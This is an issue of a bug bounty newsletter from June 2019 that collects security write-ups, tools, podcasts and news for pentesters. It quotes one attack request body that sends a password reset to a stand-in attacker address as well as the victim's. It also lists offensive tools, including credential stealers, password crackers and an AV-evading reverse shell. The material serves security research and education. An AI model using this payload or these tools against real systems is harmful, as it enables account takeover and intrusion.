By Intigriti
June 11, 2019
Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series are curated by Mariem, better known as PentesterLand. Every week, she keeps us updated with a comprehensive list of all write-ups, tools, tutorials and resources we should not have missed.
Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.
This issue covers the week from 31 of May to 07 of June.
Foxyproxy.json for disabling distracting Firefox traffic from Burp
If you’re a regular Firefox + Burp user, you probably have noticed that Firefox generates some traffic that shows up in Burp, like requests to http://detectportal.firefox.com/ or update checks.
This JSON file is @liamosaur’s Foxyproxy configuration file that allows him to disables this unwanted traffic.
This isn’t a fully disclosed writeup, but the little information shared is mind-boggling.
Ilya/exadmin was able to steal other users’ password reset link by entering an array of email addresses instead of one email address.
The request’s body looked like this: {“email_address”:[“admin@breadcrumb.com”,”attacker@evil.com”]}.
It would be interesting to see what the backend code looks like, but even without knowing this is an interesting idea to try on other programs.
@0xpatrik shares his new subdomain enumeration wokflow.
I know, there are already dozens (hundreds?) of subdomain enumeration articles out there, and @0xpatrik himself already talked about this same topic… but here he shows how he improved his methodology for more efficiency and better results. Interested yet?
This is a great guide for anyone interested in Web app security or bug bounty. It has 3 sections that correspond to the following learning phases:
Basics of Networks, Programming & Automation
Learning about Vulnerabilities, Resource for practicing, Tools…
Selecting a target, starting tests & writing reports
Each phase is explained with the necessary resources to get you started. So if you don’t know where to start, this is perfect!
DirectoryImporter is a Java Burp Suite extension that allows you to import directory bruteforcing results into Burp.
Until now, the alternative was to proxy bruteforcing tools through burp to check the results (or do it manually).
So this can be pretty handy. For now, only Dirsearch and Gobuster are supported. But you can add any other bruteforcing tool you want by adding a parser.
My Entrepreneurial Journey – Episode 2: Week One of Business Ownership
Bug Bounty World’s Pranav Hivarekar Interviews Rahul Maini – Bug Bounty Talks
AusCERT2019 Day 1 – Heidi Winter (Intro to CTFs)
Coalcast Episode 5 PT 1 – Marcello Salvati (Byt3bl33d3r) and Dan McInerney
Application Security Podcast: Björn Kimminich — The new JuiceShop, GSOC, and Open Security Summit
Smashing Security 131: Zap yourself from the net, and patch now against BlueKeep
API Security Project: API Security Top 10 project launched by OWASP
The Darkside of Red-Teaming? Common Traps & Pitfalls In Recent Red-Teaming
IP Disclosure of Servers Behind WAFs Using WordPress XML-RPC
Syncing yourself to Global Administrator in Azure Active Directory
Hidden Helpers: Security-Focused HTTP Headers & Security Header Scanner
Top GitHub Dorks and Tools Used to Scan GitHub Repositories for Sensitive Data
Microsoft Edge Extensions Host Permission Bypass (CVE-2019-0678)
We Decide What You See: Remote Code Execution on a Major IPTV Platform
NVIDIA GeForce Experience OS Command Injection CVE-2019-5678
Open redirect on Upserve ($1,200)
Auhtorization flaw on Shopify ($2,000)
CSP bypass on Paypal ($900)
See more writeups on The list of bug bounty writeups.
GPOCheck: Tool for auditing GPO on Windows AD
Seccubus: Automates vulnerability scanning with: Nessus, OpenVAS, NMap, SSLyze, Medusa, SkipFish, OWASP ZAP and SSLlabs
Ansible-burp_extensions: Ansible playbook to install Burp extensions
Cloud_enum: Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud
H2buster: A threaded, recursive, web directory brute-force scanner over HTTP/2
Venom: Auto Recon Bash Script
Liffy: Local file inclusion exploitation tool
Taint’em All: Taint analysis tool for PHP
Fatt /fingerprintAllTheThings: A pyshark based script for extracting network metadata and fingerprints from pcap files and live network traffic
Leprechaun & Tutorial: This tool is used to map out the network data flow to help penetration testers identify potentially valuable targets.
Mirage: A powerful and modular framework dedicated to the security analysis of wireless communications
CloudCopy: Stealing hashes from Domain Controllers in the Cloud
Byepass: Automates a large number of password cracking tasks using optimized dictionaries and mangling rules
Zydra: A file password recovery tool and Linux shadow file cracker. It uses the dictionary search or Brute force method for cracking passwords
Recsech: Websites footprinting and recon tool. It collects DNS Information, subdomains, Subdomain takeovers, does Github recon, detects honeypots…
Sshd-poison: A tool to get creds of pam based sshd authentication
ReverseTCPShell: Reverse Encrypted (AES) Shell over TCP using PowerShell SecureString, to Bypass Detection (FW\AV\IPS\IDS). Useful for RedTeams
WordLists-20111129: Lists of words based on common web directory and file names
Mobile: Xecurity Labs mobile security & applications reports
secDevLabs: Laboratory for those who are interested in learning about web security
Get “Breaking into Information Security: Learning the Ropes 101” for free until the end of the month
Cookies with SameSite by default: ““SameSite” is a reasonably robust defense against some classes of cross-site request forgery (CSRF) attacks, but developers currently need to opt-into its protections by specifying a SameSite attribute. In other words, developers are vulnerable to CSRF attacks by default.”
Microsoft Windows RDP Network Level Authentication Bypass (CVE-2019-9510): What You Need to Know
Cryptocurrency startup Komodo hacks itself to protect its users’ funds from hackers
‘A Windows flaw so bad, even the NSA is begging users to update’
BlueKeep ‘Mega-Worm’ Looms as Fresh PoC Shows Full System Takeover: “A working exploit for the critical remote code-execution flaw shows how an unauthenticated attacker can achieve full run of a victim machine in about 22 seconds.”
New adware “BeiTaAd” found hidden within popular applications in app store
Plot to steal cryptocurrency foiled by the npm security team
Google confirms that advanced backdoor came preinstalled on Android devices
The “pizza” method – a new way for hackers to get company data
Apple launches privacy-focused login tech to throw web trackers off users’ scent
Apple sunsets iTunes: iTunes will be replaced with 3 standalone desktop apps called Music, Podcasts & TV
Don’t blink, but 5G is about to change a lot more than just watching movies
This is how hackers make money from your stolen medical data
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 05/31/2019 to 06/07/2019.
Subscribe to the newsletter here!
Disclaimer:
The views and opinions expressed in this article are those of the curators and do not necessarily reflect the position of intigriti.Curated by Pentester Land & Sponsored by Intigriti